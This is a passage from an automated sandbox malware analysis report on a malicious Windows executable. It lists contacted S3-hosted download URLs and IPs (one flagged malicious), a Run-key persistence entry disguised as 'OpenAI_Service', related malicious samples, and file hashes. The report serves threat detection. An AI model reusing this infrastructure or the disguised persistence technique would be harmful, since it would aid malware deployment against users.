                                http://s3-r-w.ap-east-1.amazonaws.comdVJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002977000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://anydesk17.s3.ap-east-1.amazonaws.comVJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002977000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 0000000B.00000002.2597298593.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2568860335.000000000C4DC000.00000004.00000001.00020000.00000000.sdmpfalse
                                    high
                                    https://api.msn.com/explorer.exe, 0000000B.00000002.2589830986.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2557975463.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3870691749.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3867808677.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2665757256.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2656869082.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673852456.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4601406325.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2662236331.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3865469179.0000000008DD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669765501.0000000008DD8000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://anydesk17.s3.ap-east-1.amazonaws.com/vcruntime140_1.dlldVJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://wns.windows.com/explorer.exe, 0000000E.00000003.3867808677.0000000008E7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3870691749.0000000008E7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3865469179.0000000008E7E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4601406325.0000000008E7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        http://anydesk17.s3.ap-east-1.amazonaws.comdVJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002977000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A9A000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A4F000.00000004.00000800.00020000.00000000.sdmp, VJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002A6E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameVJQyKuHEUe.exe, 00000000.00000002.2529667483.0000000002964000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://www.battle.net/shop/simplecheckout/loadingzfon.exe, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://crl.vexplorer.exe, 0000000B.00000002.2581630998.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2551388655.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2705880886.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2686333787.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.4594191362.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669095674.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2681020185.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2673608765.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2681446324.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3867700220.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3871930206.000000000485B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.3871870642.000000000484F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2669522029.0000000004849000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2660154040.0000000004849000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://nydus.battle.net/App/zfon.exe, 00000005.00000000.2525776894.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.2527059033.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000002.2606835994.00007FF7F981B000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000000.2806503804.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001A.00000002.2809331354.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000000.2807948806.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001B.00000002.2809299266.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000000.2959614142.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001C.00000002.2961814980.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000002.2961682739.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001D.00000000.2960499282.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000002.3553393851.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001E.00000000.3549567178.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000002.3553394809.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 0000001F.00000000.3551069756.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000000.4164944378.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000022.00000002.4185877613.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000002.4185778715.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000023.00000000.4182637611.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmpfalse
                                              high
                                              https://wns.windows.com/)sexplorer.exe, 0000000B.00000002.2589830986.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.2557975463.00000000099C0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                3.5.239.146
                                                unknownUnited States
                                                16509AMAZON-02USfalse
                                                27.50.63.8
                                                unknownSingapore
                                                64050BCPL-SGBGPNETGlobalASNSGtrue
                                                52.95.161.33
                                                unknownUnited States
                                                16509AMAZON-02USfalse
                                                3.5.238.183
                                                unknownUnited States
                                                16509AMAZON-02USfalse
                                                3.5.237.31
                                                s3-r-w.ap-east-1.amazonaws.comUnited States
                                                16509AMAZON-02USfalse
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1577406
                                                Start date and time:2024-12-18 13:04:39 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 13m 57s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:35
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:1
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:VJQyKuHEUe.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:7b2d2c13f652b5172c9930aa164163caeda8820935cccd9983d924aa90d294d0.exe
                                                Detection:MAL
                                                Classification:mal100.evad.winEXE@23/25@5/5
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 62%
                                                • Number of executed functions: 35
                                                • Number of non-executed functions: 338
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                • Exclude process from analysis (whitelisted): dllhost.exe, UserOOBEBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SearchApp.exe, WerFault.exe, ShellExperienceHost.exe, WMIADAP.exe, svchost.exe, StartMenuExperienceHost.exe, TextInputHost.exe, mobsync.exe
                                                • Excluded IPs from analysis (whitelisted): 204.79.197.203, 23.218.208.109, 13.107.246.63, 20.12.23.50, 2.16.158.91, 20.190.177.82, 2.16.158.50
                                                • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, r.bing.com, a-0003.a-msedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, api-msn-com.a-0003.a-msedge.net
                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                • Report size getting too big, too many NtCreateKey calls found.
                                                • Report size getting too big, too many NtEnumerateKey calls found.
                                                • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                • Report size getting too big, too many NtOpenKey calls found.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                • VT rate limit hit for: VJQyKuHEUe.exe
                                                TimeTypeDescription
                                                07:05:46API Interceptor248x Sleep call for process: VJQyKuHEUe.exe modified
                                                07:06:23API Interceptor1639x Sleep call for process: explorer.exe modified
                                                07:06:54API Interceptor3399455x Sleep call for process: hh.exe modified
                                                13:06:28AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OpenAI_Service C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                13:06:36AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OpenAI_Service C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\zfon.exe
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                3.5.239.146nrGkqbCyKP.exeGet hashmaliciousUnknownBrowse
                                                  R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                    Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                      drivers.exeGet hashmaliciousUnknownBrowse
                                                        27.50.63.8nrGkqbCyKP.exeGet hashmaliciousUnknownBrowse
                                                          9Kdid5k13f.exeGet hashmaliciousUnknownBrowse
                                                            9Kdid5k13f.exeGet hashmaliciousUnknownBrowse
                                                              drivers.exeGet hashmaliciousUnknownBrowse
                                                                drivers.exeGet hashmaliciousUnknownBrowse
                                                                  3.5.238.183drivers.exeGet hashmaliciousUnknownBrowse
                                                                    3.5.237.31sxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                      drivers.exeGet hashmaliciousUnknownBrowse
                                                                        Installer_1.exeGet hashmaliciousUnknownBrowse
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          s3-r-w.ap-east-1.amazonaws.comnrGkqbCyKP.exeGet hashmaliciousUnknownBrowse
                                                                          • 3.5.239.146
                                                                          sxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                          • 52.95.161.78
                                                                          R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                          • 3.5.239.146
                                                                          Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                          • 3.5.239.146
                                                                          Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                          • 52.95.161.78
                                                                          drivers.exeGet hashmaliciousUnknownBrowse
                                                                          • 52.95.161.62
                                                                          GameBoxMini.exeGet hashmaliciousUnknownBrowse
                                                                          • 3.5.236.11
                                                                          drivers.exeGet hashmaliciousUnknownBrowse
                                                                          • 3.5.237.31
                                                                          https://www.tik0k.com/Get hashmaliciousUnknownBrowse
                                                                          • 3.5.237.170
                                                                          http://capitalhillblue.com/Get hashmaliciousUnknownBrowse
                                                                          • 3.5.236.180
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          AMAZON-02UShttp://www.mynylgbs.comGet hashmaliciousUnknownBrowse
                                                                          • 100.20.173.79
                                                                          nrGkqbCyKP.exeGet hashmaliciousUnknownBrowse
                                                                          • 52.95.160.78
                                                                          sxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                          • 3.5.237.31
                                                                          R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                          • 52.95.161.78
                                                                          Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                          • 3.5.239.146
                                                                          loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                          • 44.247.24.192
                                                                          loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                          • 18.255.125.151
                                                                          Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                          • 52.95.161.78
                                                                          loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                          • 13.121.254.215
                                                                          loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                          • 34.242.60.208
                                                                          AMAZON-02UShttp://www.mynylgbs.comGet hashmaliciousUnknownBrowse
                                                                          • 100.20.173.79
                                                                          nrGkqbCyKP.exeGet hashmaliciousUnknownBrowse
                                                                          • 52.95.160.78
                                                                          sxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                          • 3.5.237.31
                                                                          R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                          • 52.95.161.78
                                                                          Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                          • 3.5.239.146
                                                                          loligang.spc.elfGet hashmaliciousMiraiBrowse
                                                                          • 44.247.24.192
                                                                          loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                          • 18.255.125.151
                                                                          Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                          • 52.95.161.78
                                                                          loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                          • 13.121.254.215
                                                                          loligang.sh4.elfGet hashmaliciousMiraiBrowse
                                                                          • 34.242.60.208
                                                                          BCPL-SGBGPNETGlobalASNSG7nJ9Jo78Vq.dllGet hashmaliciousUnknownBrowse
                                                                          • 118.107.29.172
                                                                          nrGkqbCyKP.exeGet hashmaliciousUnknownBrowse
                                                                          • 27.50.63.8
                                                                          9Kdid5k13f.exeGet hashmaliciousUnknownBrowse
                                                                          • 27.50.63.8
                                                                          9Kdid5k13f.exeGet hashmaliciousUnknownBrowse
                                                                          • 27.50.63.8
                                                                          3zhEXB7iUp.dllGet hashmaliciousUnknownBrowse
                                                                          • 118.107.29.172
                                                                          SGVKcFqU08.exeGet hashmaliciousUnknownBrowse
                                                                          • 118.107.29.172
                                                                          i4VmSW2D4u.dllGet hashmaliciousUnknownBrowse
                                                                          • 118.107.29.172
                                                                          3zhEXB7iUp.dllGet hashmaliciousUnknownBrowse
                                                                          • 118.107.29.172
                                                                          i4VmSW2D4u.dllGet hashmaliciousUnknownBrowse
                                                                          • 118.107.29.172
                                                                          drivers.exeGet hashmaliciousUnknownBrowse
                                                                          • 27.50.63.8
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          3b5074b1b5d032e5620f69f9f700ff0enrGkqbCyKP.exeGet hashmaliciousUnknownBrowse
                                                                          • 3.5.237.31
                                                                          sxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                          • 3.5.237.31
                                                                          R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                          • 3.5.237.31
                                                                          Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                          • 3.5.237.31
                                                                          Hki0FN5Nqr.exeGet hashmaliciousUnknownBrowse
                                                                          • 3.5.237.31
                                                                          chrome11.exeGet hashmaliciousUnknownBrowse
                                                                          • 3.5.237.31
                                                                          chrome11.exeGet hashmaliciousUnknownBrowse
                                                                          • 3.5.237.31
                                                                          Lu4421.exeGet hashmaliciousStealeriumBrowse
                                                                          • 3.5.237.31
                                                                          Lu4421.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                          • 3.5.237.31
                                                                          http://trackmail.info/QLTRG66TP4/offer/00248/811/iuk7x/b4q/41/32Get hashmaliciousUnknownBrowse
                                                                          • 3.5.237.31
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          C:\Users\user\Dota06d09731-01b5-4a5a-b3f9-22953fc5b314\MSVCP140.dllnrGkqbCyKP.exeGet hashmaliciousUnknownBrowse
                                                                            sxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                              R0SkdJNujW.exeGet hashmaliciousUnknownBrowse
                                                                                drivers.exeGet hashmaliciousUnknownBrowse
                                                                                  GameBoxMini.exeGet hashmaliciousUnknownBrowse
                                                                                    drivers.exeGet hashmaliciousUnknownBrowse
                                                                                      RQoBY766F5.exeGet hashmaliciousBabukBrowse
                                                                                        RQoBY766F5.exeGet hashmaliciousBabukBrowse
                                                                                          https://www.evergabe-online.de/installer/oba-light/oba-light_windows-x64.exeGet hashmaliciousUnknownBrowse
                                                                                            RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):65536
                                                                                              Entropy (8bit):0.8487509662971519
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:n8MGdswhM1y/fhQXIDcQ1c6xPcEScw3AGSMSy+HbHgnoW6He6yoVa0SKLnGS5SgK:8MGdA0794ajgizuiFKZ24lO87
                                                                                              MD5:D17FBA6ED8C6AF0F51A8A4A8906407E5
                                                                                              SHA1:D4AFBE75ABDC999398122D145D29384306D75C3A
                                                                                              SHA-256:558FAA761D6E1B59EFE2D416F89729DB48726492C49636CCDD563AE1CD340B47
                                                                                              SHA-512:E2CA236644E46E15D0CBE64E0144D04B461279E4F84A2374511631C7029C554E84E8A94A09D94FC6DA33BDB4656E4EB2567F6ED3CC14F845B1553A435A4DA990
                                                                                              Malicious:false
                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.9.7.1.8.3.5.0.8.8.6.8.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.1.3.1.0.7.2.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.7.e.7.9.a.8.f.-.5.2.6.e.-.4.4.4.2.-.8.9.c.d.-.3.e.4.c.0.2.9.4.4.a.f.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.6.f.0.2.a.9.-.7.e.2.f.-.4.a.9.a.-.a.d.e.9.-.9.c.4.3.c.0.f.0.1.f.a.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.z.f.o.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.d.0.-.0.0.0.1.-.0.0.1.4.-.9.b.4.9.-.6.6.3.e.4.5.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.4.9.e.e.6.3.5.9.c.0.3.f.2.2.a.c.a.a.5.0.0.9.9.9.8.a.f.4.f.9.7.0.0.0.0.f.f.f.f.!.0.0.0.0.f.5.5.5.c.3.a.9.a.c.9.b.b.d.5.8.5.9.d.1.9.5.8.a.8.4.4.f.c.d.d.5.e.5.1.0.6.3.3.9.!.z.f.o.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.7././.0.8././.0.1.:.1.8.:.5.7.:.1.4.!.0.!.z.f.o.n...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.
                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):65536
                                                                                              Entropy (8bit):0.8143862519948792
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:sGhGdswhM1y/fhQXIDcQyc6lzcE0cw3l0SMSy+HbHgnoW6He6yoVa0SKLnGS5Sgo:LGdA0MZzepTjgIzuiFKZ24lO87
                                                                                              MD5:F56E0E86C3FA4597CAA2287A711BD2B6
                                                                                              SHA1:450EA5DDEEC0315A358AC5A42F2CA2DD732DD3DB
                                                                                              SHA-256:6B40175127C9EDA0C7FAA8470BE014048D9DD8CF900B7C1FFB008C42D283972F
                                                                                              SHA-512:88719E35FE018AB18FC7DB7A556E1000A51E5C6EEBDA12FEAAA0F6B22C6EDD52C3C1FEC8F4280C3D6E17F4B137566EF0DFECBF89DA900CEC9212F8E844DA158A
                                                                                              Malicious:false
                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.9.9.7.1.7.9.3.3.8.8.0.9.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.8.4.b.8.0.a.8.-.5.6.c.8.-.4.1.8.f.-.9.6.0.9.-.d.b.2.a.3.a.9.f.c.9.5.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.3.c.6.e.2.b.3.-.c.f.4.f.-.4.4.f.a.-.8.8.5.c.-.b.5.2.0.7.3.4.d.b.d.c.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.z.f.o.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.7.d.0.-.0.0.0.1.-.0.0.1.4.-.9.b.4.9.-.6.6.3.e.4.5.5.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.e.4.9.e.e.6.3.5.9.c.0.3.f.2.2.a.c.a.a.5.0.0.9.9.9.8.a.f.4.f.9.7.0.0.0.0.f.f.f.f.!.0.0.0.0.f.5.5.5.c.3.a.9.a.c.9.b.b.d.5.8.5.9.d.1.9.5.8.a.8.4.4.f.c.d.d.5.e.5.1.0.6.3.3.9.!.z.f.o.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.7././.0.8././.0.1.:.1.8.:.5.7.:.1.4.!.0.!.z.f.o.n...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.I.d.=.4.2.9.....I.s.F.a.t.a.l.
                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                              File Type:Mini DuMP crash report, 15 streams, Wed Dec 18 12:06:19 2024, 0x1205a4 type
                                                                                              Category:dropped
                                                                                              Size (bytes):59720
                                                                                              Entropy (8bit):1.6882843120225532
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:5I88lJcrTNKcsqOe10TWp6P/zi7/6DTtxjMgBLiTkuGTgstV/0QyvpJpDembB5xw:Jj6rejA/zOC/v05GTgGsp1XtwS+h
                                                                                              MD5:BA1EA70810BDA9757ADEAE3D48511BD3
                                                                                              SHA1:8C08C4C09A6582AB68CA5BFA29809EF1E27D43D7
                                                                                              SHA-256:D18B60B0F5BF6E5AA836B916E246B440BC74822FA5F9C873B5A61D07EBCD84D2
                                                                                              SHA-512:43A868DE8805095149A0752EF9D33EAFFEA5D15DCFF423E4D72A4AAF42A098D69CA1A1A20854CB8BB7047A0640B42D5B25B4CD3D1A715AC924D7863481A2B773
                                                                                              Malicious:false
                                                                                              Preview:MDMP..a..... .........bg........................h...........<...............r,..........`.......8...........T...............X...........L...........8...............................................................................eJ..............Lw......................T.............bg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                              Process:C:\Windows\System32\WerFault.exe
                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):8492
                                                                                              Entropy (8bit):3.691847802179193
                                                                                              Encrypted:false
                                                                                              SSDEEP:192:R6l7wVeJ+WpE26YAiXgmfteslipBRv89bh1kform:R6lXJ3pE26Y9XgmfteHQhGfJ
                                                                                              MD5:DA1C49740DACB45F7D8F2B10B63C65F3
                                                                                              SHA1:1E9045C23668B08F883A18B375DDF5E1F1402162
                                                                                              SHA-256:69262F9D66BCC7A68027B00AAF64304FAF591A40B01C5C9ED3663C699956264D
                                                                                              SHA-512:7E7AF4EFA57E402651D7ADE650E187D5A9795D4605A8399FA8418D1EF53C6B383BEEDCE2C02B87271F7A1061AA930F05B580D720DF9E5FBAE3C331EEE2993A6F
                                                                                              Malicious:false
